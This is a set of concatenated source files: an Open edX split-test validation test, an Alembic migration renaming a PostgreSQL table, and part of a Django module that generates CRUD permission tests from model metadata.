        self.assertEqual(active_children, [])
        self.assertEqual(inactive_children, children)

    def test_validation_messages(self):
        """
        Test the validation messages produced for different split test configurations.
        """
        split_test_module = self.split_test_module

        def verify_validation_message(message, expected_message, expected_message_type,
                                      expected_action_class=None, expected_action_label=None,
                                      expected_action_runtime_event=None):
            """
            Verify that the validation message has the expected validation message and type.
            """
            self.assertEqual(message.text, expected_message)
            self.assertEqual(message.type, expected_message_type)
            if expected_action_class:
                self.assertEqual(message.action_class, expected_action_class)
            else:
                self.assertFalse(hasattr(message, "action_class"))
            if expected_action_label:
                self.assertEqual(message.action_label, expected_action_label)
            else:
                self.assertFalse(hasattr(message, "action_label"))
            if expected_action_runtime_event:
                self.assertEqual(message.action_runtime_event, expected_action_runtime_event)
            else:
                self.assertFalse(hasattr(message, "action_runtime_event"))

        def verify_summary_message(general_validation, expected_message, expected_message_type):
            """
            Verify that the general validation message has the expected validation message and type.
            """
            self.assertEqual(general_validation.text, expected_message)
            self.assertEqual(general_validation.type, expected_message_type)

        # Verify the messages for an unconfigured user partition
        split_test_module.user_partition_id = -1
        validation = split_test_module.validate()
        self.assertEqual(len(validation.messages), 0)
        verify_validation_message(
            validation.summary,
            u"The experiment is not associated with a group configuration.",
            StudioValidationMessage.NOT_CONFIGURED,
            'edit-button',
            u"Select a Group Configuration",
        )

        # Verify the messages for a correctly configured split_test
        split_test_module.user_partition_id = 0
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')])
        ]
        validation = split_test_module.validate_split_test()
        self.assertTrue(validation)
        # assertIsNone takes (obj, msg); the previous trailing None was a
        # redundant msg argument and has been dropped.
        self.assertIsNone(split_test_module.general_validation_message())

        # Verify the messages for a split test with too few groups
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition',
                          [Group("0", 'alpha'), Group("1", 'beta'), Group("2", 'gamma')])
        ]
        validation = split_test_module.validate()
        self.assertEqual(len(validation.messages), 1)
        verify_validation_message(
            validation.messages[0],
            u"The experiment does not contain all of the groups in the configuration.",
            StudioValidationMessage.ERROR,
            expected_action_runtime_event='add-missing-groups',
            expected_action_label=u"Add Missing Groups"
        )
        verify_summary_message(
            validation.summary,
            u"This content experiment has issues that affect content visibility.",
            StudioValidationMessage.ERROR
        )

        # Verify the messages for a split test with children that are not associated with any group
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition',
                          [Group("0", 'alpha')])
        ]
        validation = split_test_module.validate()
        self.assertEqual(len(validation.messages), 1)
        verify_validation_message(
            validation.messages[0],
            u"The experiment has an inactive group. Move content into active groups, then delete the inactive group.",
            StudioValidationMessage.WARNING
        )
        verify_summary_message(
            validation.summary,
            u"This content experiment has issues that affect content visibility.",
            StudioValidationMessage.WARNING
        )

        # Verify the messages for a split test with both missing and inactive children
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition',
                          [Group("0", 'alpha'), Group("2", 'gamma')])
        ]
        validation = split_test_module.validate()
        self.assertEqual(len(validation.messages), 2)
        verify_validation_message(
            validation.messages[0],
            u"The experiment does not contain all of the groups in the configuration.",
            StudioValidationMessage.ERROR,
            expected_action_runtime_event='add-missing-groups',
            expected_action_label=u"Add Missing Groups"
        )
        verify_validation_message(
            validation.messages[1],
            u"The experiment has an inactive group. Move content into active groups, then delete the inactive group.",
            StudioValidationMessage.WARNING
        )
        # With two messages of type error and warning priority given to error.
        verify_summary_message(
            validation.summary,
            u"This content experiment has issues that affect content visibility.",
            StudioValidationMessage.ERROR
        )

        # Verify the messages for a split test referring to a non-existent user partition
        split_test_module.user_partition_id = 2
        validation = split_test_module.validate()
        self.assertEqual(len(validation.messages), 1)
        verify_validation_message(
            validation.messages[0],
            u"The experiment uses a deleted group configuration. "
            u"Select a valid group configuration or delete this experiment.",
            StudioValidationMessage.ERROR
        )
        verify_summary_message(
            validation.summary,
            u"This content experiment has issues that affect content visibility.",
            StudioValidationMessage.ERROR
        )

        # Verify the message for a split test referring to a non-random user partition
        split_test_module.user_partitions = [
            UserPartition(
                10, 'incorrect_partition', 'Non Random Partition', [Group("0", 'alpha'), Group("2", 'gamma')],
                scheme=self.non_random_scheme
            )
        ]
        split_test_module.user_partition_id = 10
        validation = split_test_module.validate()
        self.assertEqual(len(validation.messages), 1)
        verify_validation_message(
            validation.messages[0],
            u"The experiment uses a group configuration that is not supported for experiments. "
            u"Select a valid group configuration or delete this experiment.",
            StudioValidationMessage.ERROR
        )
        verify_summary_message(
            validation.summary,
            u"This content experiment has issues that affect content visibility.",
            StudioValidationMessage.ERROR
        )
| agpl-3.0 |
intel-ctrlsys/actsys | datastore/datastore/database_schema/schema_migration/versions/d43655797899_changing_table_name_from_group_to_.py | 1 | 2060 | """Changing table name from 'group' to 'device_group'
Revision ID: d43655797899
Revises: 38f3c80e9932
Create Date: 2017-08-24 15:17:10.671537
"""
import textwrap
from alembic import op
# revision identifiers, used by Alembic.
# Identifier of this migration.
revision = 'd43655797899'
# Revision this migration applies on top of (and reverts to on downgrade).
down_revision = '38f3c80e9932'
branch_labels = None
depends_on = None
def upgrade():
    """Rename public.group to device_group and repoint upsert_group at it."""
    rename_sql = """ALTER TABLE public.group RENAME TO device_group;"""
    op.execute(textwrap.dedent(rename_sql))

    # Recreate the upsert helper so it inserts into the renamed table.
    upsert_sql = """
    CREATE OR REPLACE FUNCTION public.upsert_group(p_group_name character varying, p_device_list character varying)
      RETURNS integer AS
    $BODY$
    DECLARE num_rows integer;
    BEGIN
        INSERT INTO public.device_group AS gro (group_name, device_list)
        VALUES (p_group_name, p_device_list)
        ON CONFLICT (group_name) DO UPDATE
        SET
            device_list = p_device_list
        WHERE gro.group_name = p_group_name;
        GET DIAGNOSTICS num_rows = ROW_COUNT;
        RETURN num_rows;
    END;
    $BODY$
    LANGUAGE plpgsql VOLATILE
    COST 100;"""
    op.execute(textwrap.dedent(upsert_sql))
def downgrade():
    # Restore the original table name; "group" is quoted here because GROUP is
    # a reserved word in SQL.
    op.execute(textwrap.dedent("""ALTER TABLE device_group RENAME TO "group";"""))
    # Recreate upsert_group against the restored table.
    # NOTE(review): the INSERT below targets `public.group` *unquoted*, while
    # the RENAME above needed quotes — confirm PostgreSQL accepts the unquoted
    # qualified name here, otherwise it should be `public."group"`.
    op.execute(textwrap.dedent("""
    CREATE OR REPLACE FUNCTION public.upsert_group(p_group_name character varying, p_device_list character varying)
      RETURNS integer AS
    $BODY$
    DECLARE num_rows integer;
    BEGIN
        INSERT INTO public.group AS gro (group_name, device_list)
        VALUES (p_group_name, p_device_list)
        ON CONFLICT (group_name) DO UPDATE
        SET
            device_list = p_device_list
        WHERE gro.group_name = p_group_name;
        GET DIAGNOSTICS num_rows = ROW_COUNT;
        RETURN num_rows;
    END;
    $BODY$
    LANGUAGE plpgsql VOLATILE
    COST 100;"""))
| apache-2.0 |
SafeStack/ava | ava_core/test_builder/views.py | 2 | 40881 | # Python Imports
from logging import getLogger
import json
import os
import shutil
# Django Imports
from django.apps import *
from django.conf import settings
from django.http import HttpResponse
# Rest Imports
from rest_framework.views import APIView
from rest_framework import status
# Logger
# Module-level logger for the test-builder views.
log = getLogger(__name__)
"""
Helper functions
"""
def plain_to_bumpy(plain):
    """
    Convert a space-separated name to BumpyCase: 'hello world' -> 'HelloWorld'.

    Characters other than the first letter of each word are kept as-is.
    Fixes from the original: `len(plain) is not 0` and `character is ' '`
    were identity comparisons that only worked because CPython interns small
    ints and one-character strings; they are now proper value tests.
    """
    bumpy = ''
    if plain:
        to_upper = True
        for character in plain:
            if to_upper:
                # Note: for consecutive spaces the second space is emitted
                # (' '.upper() is ' ') — behaviour preserved from the original.
                bumpy += character.upper()
                to_upper = False
            elif character == ' ':
                to_upper = True
            else:
                bumpy += character
    return bumpy
def bumpy_to_plain(bumpy):
    """
    Convert BumpyCase to a space-separated lower-case name:
    'HelloWorld' -> 'hello world'.

    Fix from the original: `len(bumpy) is not 0` was an identity comparison
    against an int literal; replaced with a truthiness test.
    """
    plain = ''
    if bumpy:
        plain += bumpy[0].lower()
        for character in bumpy[1:]:
            # Each upper-case letter starts a new word.
            if character.isupper():
                plain += ' '
            plain += character.lower()
    return plain
def plain_to_snake(plain):
    """Convert a space-separated name to snake_case: 'hello world' -> 'hello_world'."""
    # str.replace does the per-character ' ' -> '_' substitution in one C-level
    # pass, and avoids the identity comparison (`character is ' '`) the
    # original loop relied on.
    return plain.replace(' ', '_')
def snake_to_plain(snake):
    """Convert snake_case to a space-separated name: 'hello_world' -> 'hello world'."""
    # Inverse of plain_to_snake; replaces the original char-by-char loop that
    # used an identity comparison (`character is '_'`).
    return snake.replace('_', ' ')
def bumpy_to_snake(bumpy):
    """Convert BumpyCase straight to snake_case via the plain (spaced) form."""
    plain_form = bumpy_to_plain(bumpy)
    return plain_to_snake(plain_form)
def snake_to_bumpy(snake):
    """Convert snake_case straight to BumpyCase via the plain (spaced) form."""
    plain_form = snake_to_plain(snake)
    return plain_to_bumpy(plain_form)
def write_to_file(path, data, archive_old=False):
    """
    Write *data* to *path* (print() appends a trailing newline), optionally
    archiving an existing file first.

    When settings.TEST_BUILDER_STORE_TEMP is set, the path is redirected into
    '<TEST_BUILDER_DIRECTORY>output/<original directory>/'.  When
    *archive_old* is set (and archiving is not globally disabled via
    TEST_BUILDER_FORCE_NO_ARCHIVE), an existing file at *path* is first
    copied to '<path>.old_n' using the first free digit n.
    """
    # Check that the setting for storing locally is true.
    # True - Update path to be within the media file for test builder.
    if settings.TEST_BUILDER_STORE_TEMP:
        path_split = path.rsplit('/', 1)
        directory = '{}output/{}/'.format(settings.TEST_BUILDER_DIRECTORY, path_split[0])
        # exist_ok makes create-or-ignore race-free; replaces the original
        # try/except FileExistsError.
        os.makedirs(directory, exist_ok=True)
        # Update the used path variable
        path = directory + path_split[1]

    # Archive the current file as '<path>.old_n' with the first free digit n.
    if os.path.isfile(path) and archive_old and not settings.TEST_BUILDER_FORCE_NO_ARCHIVE:
        path_template = '{}.old_{{}}'.format(path)
        archive_digit = 0
        old_path = path_template.format(archive_digit)
        while os.path.isfile(old_path):
            archive_digit += 1
            old_path = path_template.format(archive_digit)
        shutil.copyfile(path, old_path)

    # Output data to path; the with-block closes the handle (the explicit
    # close() in the original was redundant).
    with open(path, 'w') as outfile:
        print(data, file=outfile)
"""
Creates the data for a project
"""
class ProjectDataBuilder(APIView):
    """
    Collects metadata about every model in the project's own apps and dumps it
    as a JSON file for later consumption by ProjectTestBuilder.
    """

    def get(self, request):
        """
        Walk all installed app configs, gather model/field metadata and write
        it to '<TEST_BUILDER_DIRECTORY><TEST_BUILDER_PROJECT_DATA_OUTPUT>.json'.
        """
        # Load settings from Django.
        prefix = settings.TEST_BUILDER_INPUT_APP_PREFIX
        ignore_apps = settings.TEST_BUILDER_IGNORED_APPS
        ignore_models = settings.TEST_BUILDER_IGNORED_MODELS

        # Iterate over app configs, storing related data.
        project_data = dict()
        for app in apps.get_app_configs():
            # Check that app isn't to be ignored and is a part of the project directory.
            if app.name not in ignore_apps and app.name.startswith(prefix):
                # Iterate over models in app, storing relevant information.
                app_data = dict()
                for model in app.get_models():
                    # Check the model belongs to the app to avoid inheritance
                    # and abstraction, and that it is not an ignored model.
                    if app.name in str(model) and str(model) not in ignore_models:
                        # Strip the model name from the repr string.
                        model_name = str(model).split('\'')[1].split('.')[-1]
                        app_data[model_name] = self.generate_model_data(model)
                # Add apps model data to dict.
                project_data[app.name] = app_data

        # Ensure the output directory exists (exist_ok replaces the original
        # try/except FileExistsError).
        directory_name = settings.TEST_BUILDER_DIRECTORY
        os.makedirs(directory_name, exist_ok=True)

        # Format output file name and output json dump of project data.
        file_name = '{}{}.json'.format(directory_name, settings.TEST_BUILDER_PROJECT_DATA_OUTPUT)
        json_data = json.dumps(obj=project_data,
                               sort_keys=True,
                               indent=4,
                               separators=(',', ': '))
        write_to_file(file_name, json_data, True)
        return HttpResponse('Success', status=status.HTTP_200_OK)

    def generate_model_data(self, model):
        """
        Return a dict describing *model*: its fields plus default placeholder
        values (url, permissions, ...) for the user to review and edit.
        """
        # Load settings from Django.
        ignore_fields = settings.TEST_BUILDER_IGNORED_FIELDS

        # Iterate over all fields on the model, gathering relevant data.
        field_data = dict()
        for field in model._meta.get_fields(include_parents=False, include_hidden=False):
            if field.name not in ignore_fields:
                fields_data = self.generate_field_data(field)
                if fields_data:
                    field_data[field.name] = fields_data

        # Populate the model data with default values to be processed by user.
        model_data = dict()
        model_data['fields'] = field_data
        model_data['url'] = '/example'
        model_data['permissions'] = {
            'admin': ['PUSH', 'GET', 'PUT', 'DELETE'],
            'user': ['PUSH', 'GET', 'PUT', 'DELETE']
        }
        model_data['requires_owner'] = True
        model_data['requires_authentication'] = True
        model_data['unique_together'] = []
        return model_data

    def generate_field_data(self, field):
        """
        Return a dict describing *field* (type plus selected attributes), or
        None when the field has no internal type (e.g. reverse accessors).
        """
        # Attempt to get the internal type of the field.
        # Returning None on failure.
        try:
            field_type = field.get_internal_type()
        except AttributeError:
            return None

        # Gather relevant data for field.
        # (A leftover `_break = 4` debug statement that ran for ForeignKey
        # fields has been removed — it had no effect.)
        field_data = dict()
        field_data['type'] = field_type
        self.generate_field_attribute(field, field_data, 'max_length')
        self.generate_field_attribute(field, field_data, 'unique')
        self.generate_field_attribute(field, field_data, 'null')
        self.generate_field_attribute(field, field_data, 'blank')
        self.generate_field_attribute(field, field_data, 'related_model')
        if 'related_model' in field_data:
            # Reduce the model class repr to its dotted path.
            field_data['related_model'] = str(field_data['related_model']).split('\'')[1]

        self.generate_field_attribute(field, field_data, 'choices')
        if 'choices' in field_data:
            choices = field_data['choices']
            if choices:
                # Keep only the stored values, dropping the display names.
                field_data['choices'] = [choice[0] for choice in choices]
            else:
                # Drop an empty choices attribute entirely.
                field_data.pop('choices', None)
        return field_data

    @staticmethod
    def generate_field_attribute(field, field_dict, attribute_name):
        """Copy *attribute_name* from *field* into *field_dict* when present and not None."""
        attr = getattr(field, attribute_name, None)
        if attr is not None:
            field_dict[attribute_name] = attr
"""
Creates the tests for a project
"""
class ProjectTestBuilder(APIView):
def get(self, request):
# Attempt to open JSON input file with project information.
# Return bad request response on failure.
try:
file_name = '{}{}.json'.format(settings.TEST_BUILDER_DIRECTORY,
settings.TEST_BUILDER_PROJECT_DATA_INPUT)
with open(file_name) as data_file:
self.project_data = json.load(data_file)
data_file.close()
except:
return HttpResponse('No input file.', status=status.HTTP_400_BAD_REQUEST)
# Attempt to copy template file to new directory.
# Return bad request response on failure.
try:
# Take a copy of the template data.
file_name = '{}test_template.py'.format(settings.TEST_BUILDER_DIRECTORY)
with open(file_name) as data_file:
# Create file path for the output of copy.
directory_name = '{}/test.py'.format(settings.TEST_BUILDER_ABSTRACT_DIRECTORY)
# Format the data for appropriate usage.
data = data_file.read().format(project_name_snake=settings.TEST_BUILDER_INPUT_APP_PREFIX,
project_name_bumpy=snake_to_bumpy(
settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Write the data to file.
write_to_file(directory_name, data)
# Close the file handle.
data_file.close()
except FileNotFoundError:
return HttpResponse('No test template file.', status=status.HTTP_400_BAD_REQUEST)
# Attempt to copy template file to new directory.
# Return bad request response on failure.
try:
# Take a copy of the template data.
file_name = '{}test_data_template.py'.format(settings.TEST_BUILDER_DIRECTORY)
with open(file_name) as data_file:
# Create file path for the output of copy.
directory_name = '{}/test_data.py'.format(settings.TEST_BUILDER_ABSTRACT_DIRECTORY)
# Format the data for appropriate usage.
data = data_file.read().format(project_name=snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Write the data to file.
write_to_file(directory_name, data)
# Close the file handle.
data_file.close()
except FileNotFoundError:
return HttpResponse('No test data template file.', status=status.HTTP_400_BAD_REQUEST)
# Iterate over apps in project data, creating all necessary files.
for app, app_name in self.project_data.items():
# Create the test and data files for app.
test_output = self.generate_app_test(app_name=app,
app_data=self.project_data[app])
data_output = self.generate_app_data(app_name=app,
app_data=self.project_data[app])
# Create output directory name.
directory_name = '{}/{}/'.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
app.split('.', 1)[1].replace('.', '/'))
# Format output file name and output test and test data.
test_file = '{}tests.py'.format(directory_name)
write_to_file(test_file, test_output, True)
test_file = '{}test_data.py'.format(directory_name)
write_to_file(test_file, data_output, True)
return HttpResponse('Success.', status=status.HTTP_200_OK)
"""
Helper functions
"""
def get_model_data_from_name(self, model_name):
# Iterate over apps in project.
for app, app_data in self.project_data.items():
# Iterate over models in app.
for model, model_data in app_data.items():
# Check if current model name is the same as that passed.
# True - return the models data
if model in model_name:
return model_data
return None
"""
Output formatting for tests
"""
def generate_app_test(self, app_name, app_data):
# Create empty string for app file.
app_string = str()
# Store app information for future reference.
self.current_app_name = app_name
self.current_app_data = app_data
# Add header data to out string.
app_string += self.generate_header_test(app_name=app_name,
app_data=app_data) + '\n\n'
# Iterate over models in app, adding data to out string.
app_string += '# Implementation\n'
for model, model_data in app_data.items():
app_string += self.generate_model_test(model_name=model,
model_data=model_data)
app_string += '\n'
# Replace tabs with spaces
out_string = str()
for character in app_string:
if character is '\t':
out_string += ' '
else:
out_string += character
return out_string
def generate_header_test(self, app_name, app_data):
out_string = str()
# Format the dependency imports header for app file.
out_string += '# Rest Imports\n'
out_string += 'from rest_framework import status\n'
# Format the local imports header for app file.
out_string += '# Local Imports\n'
out_string += 'from {}.abstract.test import {}Test\n' \
.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Make initial formatting for model imports
data_import = 'from {}.{}.test_data import'.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
app_name.split('.', 1)[1])
# Iterate over apps models, creating necessary imports.
first_iteration = True
for model in app_data:
data_import += (' ' if first_iteration else ', ') + model + 'TestData'
first_iteration = False
out_string += data_import + '\n'
return out_string
    def generate_model_test(self, model_name, model_data):
        """
        Build the source of one generated test class ('<model_name>Test'),
        including its setUp and the create/retrieve/update/delete tests.
        Tabs are used for indentation; they are expanded later by
        generate_app_test.
        """
        out_string = str()
        # Create test model header
        out_string += 'class {}Test({}Test):\n'.format(model_name,
                                                       snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
        out_string += '\t\"\"\"\n'
        out_string += '\t{} Test\n'.format(model_name)
        out_string += '\t\"\"\"\n'
        out_string += '\n'
        # Create setup for tests
        out_string += '\tdef setUp(self):\n'
        out_string += '\t\t# Make call to super.\n'
        out_string += '\t\tsuper({}Test, self).setUp()\n'.format(snake_to_bumpy(model_name))
        out_string += '\n'
        out_string += '\t\t# Set the data type.\n'
        out_string += '\t\tself.data = {}TestData\n'.format(model_name)
        out_string += '\t\tself.data.init_requirements()\n'
        out_string += '\n'
        # Create each of the CRUD test functions
        out_string += self.generate_create_tests(model_name, model_data)
        out_string += self.generate_retrieve_tests(model_name, model_data)
        out_string += self.generate_update_tests(model_name, model_data)
        out_string += self.generate_delete_tests(model_name, model_data)
        return out_string
def generate_create_tests(self, model_name, model_data):
out_string = str()
# Create tests as user, admin and unauthenticated.
out_string += self.generate_create_as_tests(model_name, model_data, 'user')
out_string += self.generate_create_as_tests(model_name, model_data, 'admin')
out_string += self.generate_create_as_tests(model_name, model_data)
return out_string
    def generate_create_as_tests(self, model_name, model_data, user=None):
        """
        Build one generated 'create' test method for *model_name*.

        *user* selects the role the generated test logs in as ('user' or
        'admin'); None generates an unauthenticated request.  The generated
        test expects HTTP 201 only when the role has PUSH permission (or the
        model does not require authentication); otherwise a forbidden status.
        """
        out_string = str()
        # Create function header
        out_string += '\tdef test_{}_create_as_{}(self):\n'.format(bumpy_to_snake(model_name),
                                                                   user if user is not None else 'unauthenticated')
        # Create required login
        if user is not None:
            out_string += '\t\t# Log in as {}.\n'.format(user)
            out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
            out_string += '\n'
        # Create count storage
        out_string += '\t\t# Take count.\n'
        out_string += '\t\tcount = self.data.model.objects.count()\n'
        out_string += '\n'
        # Determine if push was successful
        create_successful = False
        if user in model_data['permissions'] and 'PUSH' in model_data['permissions'][user]:
            create_successful = True
        elif user is None and not model_data['requires_authentication']:
            create_successful = True
        # Create data storage
        out_string += '\t\t# Store data to use.\n'
        out_string += '\t\tdata = self.data.get_data(\'standard\')\n'
        out_string += '\n'
        # Create push request
        out_string += '\t\t# Make post request and ensure {} response.\n'.format(
            'created' if create_successful else 'unauthorized')
        out_string += '\t\tresponse = self.client.post(self.format_url(self.data.url), data, format=\'json\')\n'
        if create_successful:
            out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_201_CREATED)\n'
            out_string += '\t\tself.assertEqual(self.data.model.objects.count(), count + 1)\n'
            out_string += '\t\tself.assertTrue(self.does_contain_data(response.data, data))\n'
            out_string += '\n'
        else:
            out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
            out_string += '\t\tself.assertEqual(self.data.model.objects.count(), count)\n'
            out_string += '\n'
        return out_string
def generate_retrieve_tests(self, model_name, model_data):
out_string = str()
out_string += self.generate_retrieve_as_tests(model_name, model_data, False, 'user')
out_string += self.generate_retrieve_as_tests(model_name, model_data, True, 'user')
out_string += self.generate_retrieve_as_tests(model_name, model_data, False, 'admin')
out_string += self.generate_retrieve_as_tests(model_name, model_data, True, 'admin')
out_string += self.generate_retrieve_as_tests(model_name, model_data, False)
out_string += self.generate_retrieve_as_tests(model_name, model_data, True)
if 'requires_owner' in model_data and model_data['requires_owner']:
out_string += '\t# TODO:\tWrite retrieve owner tests'
pass
return out_string
    def generate_retrieve_as_tests(self, model_name, model_data, all=False, user=None):
        """
        Render the source of one retrieve test method as a string.

        :param model_name: Bumpy-case model name, snake-cased into the test name.
        :param model_data: Model description dict; ``permissions`` and
            ``requires_authentication`` decide the expected response.
        :param all: True generates a list-endpoint test, False a single-object
            test.  NOTE(review): this parameter shadows the builtin ``all``.
        :param user: Role to log in as ('user'/'admin'); None generates the
            unauthenticated variant.  NOTE(review): the create tests use the
            suffix 'unauthenticated' while this uses 'unauthorized' — confirm
            whether the inconsistency is intended.
        :return: Tab-indented test-method source text.
        """
        out_string = str()
        out_string += '\tdef test_{}_retrieve_{}_as_{}(self):\n'.format(bumpy_to_snake(model_name),
                                                                        'all' if all else 'single',
                                                                        user if user is not None else 'unauthorized')
        # Fixtures: create the model(s) under test while logged out.
        if all:
            out_string += '\t\t# Create new {} models.\n'.format(model_name)
            out_string += '\t\tself.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n'.format(
                user if user is not None else 'admin')
            out_string += '\t\tself.create_model_logout(self.data, data_name=\'modified\', owner=self.user_{})\n'.format(
                user if user is not None else 'admin')
            out_string += '\n'
        else:
            out_string += '\t\t# Create new {} models, storing URL.\n'.format(model_name)
            out_string += '\t\turl = self.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n'.format(
                user if user is not None else 'admin')
            out_string += '\n'
        # Create required login
        if user is not None:
            out_string += '\t\t# Log in as {}.\n'.format(user)
            out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
            out_string += '\n'
        # Determine if get was successful
        retrieve_successful = False
        if user in model_data['permissions'] and 'GET' in model_data['permissions'][user]:
            retrieve_successful = True
        elif user is None and not model_data['requires_authentication']:
            retrieve_successful = True
        out_string += '\t\t# Make get request and ensure {} response\n'.format(
            'OK' if retrieve_successful else 'unauthorized')
        out_string += '\t\tresponse = self.client.get({})\n'.format('self.format_url(self.data.url)' if all else 'url')
        if retrieve_successful:
            out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n'
            if all:
                out_string += '\t\tself.assertTrue(self.does_contain_data_list(response.data[\'results\'], [self.data.standard, self.data.modified]))\n'
            else:
                out_string += '\t\tself.assertTrue(self.does_contain_data(response.data, self.data.standard))\n'
        else:
            out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
        out_string += '\n'
        return out_string
def generate_update_tests(self, model_name, model_data):
out_string = str()
out_string += self.generate_update_as_tests(model_name, model_data, True, 'user')
out_string += self.generate_update_as_tests(model_name, model_data, False, 'user')
out_string += self.generate_update_as_tests(model_name, model_data, True, 'admin')
out_string += self.generate_update_as_tests(model_name, model_data, False, 'admin')
out_string += self.generate_update_as_tests(model_name, model_data, True)
out_string += self.generate_update_as_tests(model_name, model_data, False)
if 'requires_owner' in model_data and model_data['requires_owner']:
out_string += '\t# TODO:\tWrite update owner tests'
pass
return out_string
    def generate_update_as_tests(self, model_name, model_data, exists=False, user=None):
        """
        Render the source of one update (PUT) test method as a string.

        :param model_name: Bumpy-case model name, snake-cased into the test name.
        :param model_data: Model description dict; ``permissions`` and
            ``requires_authentication`` decide the expected response.
        :param exists: True targets a freshly created object; False targets the
            non-existent id 9999 and expects 404 when authorized.
        :param user: Role to log in as ('user'/'admin'); None generates the
            unauthenticated variant.
        :return: Tab-indented test-method source text.
        """
        out_string = str()
        out_string += '\tdef test_{}_update_{}_as_{}(self):\n'.format(bumpy_to_snake(model_name),
                                                                      'exists' if exists else 'does_not_exist',
                                                                      user if user is not None else 'unauthorized')
        if exists:
            out_string += '\t\t# Create new {} models, storing URL.\n'.format(model_name)
            out_string += '\t\turl = self.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n' \
                .format(user if user is not None else 'admin')
        # Create required login
        if user is not None:
            out_string += '\t\t# Log in as {}.\n'.format(user)
            out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
            out_string += '\n'
        # Determine if delete was successful
        # NOTE(review): the comment above says "delete" but this checks the
        # 'PUT' permission, which matches the request made below.
        put_successful = False
        if user in model_data['permissions'] and 'PUT' in model_data['permissions'][user]:
            put_successful = True
        elif user is None and not model_data['requires_authentication']:
            put_successful = True
        out_string += '\t\t# Make put request and ensure {} response.\n'\
            .format(('OK' if exists else 'not found') if put_successful else 'unauthorized')
        out_string += '\t\tresponse = self.client.put({}, self.data.get_data(\'unique\'))\n' \
            .format('url' if exists else 'self.format_url(self.data.url + \'/9999\')')
        if put_successful:
            if exists:
                out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n'
            else:
                out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n'
        else:
            out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
        # When the object exists, verify whether its stored data changed:
        # 'unique' after a successful PUT, untouched 'standard' otherwise.
        if exists:
            out_string += '\t\tself.assertTrue(self.does_contain_data_url(url, self.data.{}))\n'\
                .format('unique' if put_successful else 'standard')
        out_string += '\n'
        return out_string
def generate_delete_tests(self, model_name, model_data):
out_string = str()
out_string += self.generate_delete_as_tests(model_name, model_data, True, 'user')
out_string += self.generate_delete_as_tests(model_name, model_data, False, 'user')
out_string += self.generate_delete_as_tests(model_name, model_data, True, 'admin')
out_string += self.generate_delete_as_tests(model_name, model_data, False, 'admin')
out_string += self.generate_delete_as_tests(model_name, model_data, True)
out_string += self.generate_delete_as_tests(model_name, model_data, False)
if 'requires_owner' in model_data and model_data['requires_owner']:
out_string += '\t# TODO:\tWrite delete owner tests'
pass
return out_string
def generate_delete_as_tests(self, model_name, model_data, exists=False, user=None):
out_string = str()
out_string += '\tdef test_{}_delete_{}_as_{}(self):\n'.format(bumpy_to_snake(model_name),
'exists' if exists else 'does_not_exist',
user if user is not None else 'unauthorized')
if exists:
out_string += '\t\t# Create new {} models, storing URL.\n'.format(model_name)
out_string += '\t\turl = self.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n' \
.format(user if user is not None else 'admin')
# Create required login
if user is not None:
out_string += '\t\t# Log in as {}.\n'.format(user)
out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
out_string += '\n'
# Determine if delete was successful
delete_successful = False
if user in model_data['permissions'] and 'DELETE' in model_data['permissions'][user]:
delete_successful = True
elif user is None and not model_data['requires_authentication']:
delete_successful = True
out_string += '\t\t# Make delete request and ensure {} response\n' \
.format(('no content' if exists else 'not found') if delete_successful else 'unauthorized')
out_string += '\t\tresponse = self.client.get({})\n' \
.format('url' if exists else 'self.format_url(self.data.url + \'/9999\')')
if delete_successful:
if exists:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n'
else:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n'
else:
out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
if exists:
out_string += '\t\tself.assertEqual(self.data.model.objects.count(), {})\n'\
.format('0' if delete_successful else '1')
out_string += '\n'
return out_string
"""
Output formatting for test data
"""
def generate_app_data(self, app_name, app_data):
# Create empty string for app file.
app_string = str()
app_string += self.generate_header_data(app_name, app_data) + '\n\n'
app_string += '# Implementation\n'
for model in app_data:
app_string += '{}\n\n'.format(self.generate_model_data(model_name=model,
model_data=app_data[model]))
# Replace tabs with spaces
out_string = str()
for character in app_string:
if character is '\t':
out_string += ' '
else:
out_string += character
return out_string
    def generate_header_data(self, app_name, app_data):
        """
        Render the import header for a generated app test-data module.

        Emits the rest_framework import, the shared TestData base import, and
        one ``from <input_prefix>.<app>.models import ...`` line listing every
        non-ignored model of the app.

        :param app_name: Dotted app name; the part after the first '.' names
            the package the models are imported from.
        :param app_data: Mapping of model name -> model description dict.
        :return: Header source text.
        """
        out_string = str()
        # Format the dependency imports header for app file.
        out_string += '# Rest Imports\n'
        out_string += 'from rest_framework import status\n'
        # Format the local imports header for app file.
        out_string += '# Local Imports\n'
        out_string += 'from {}.abstract.test_data import {}TestData\n' \
            .format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX, snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
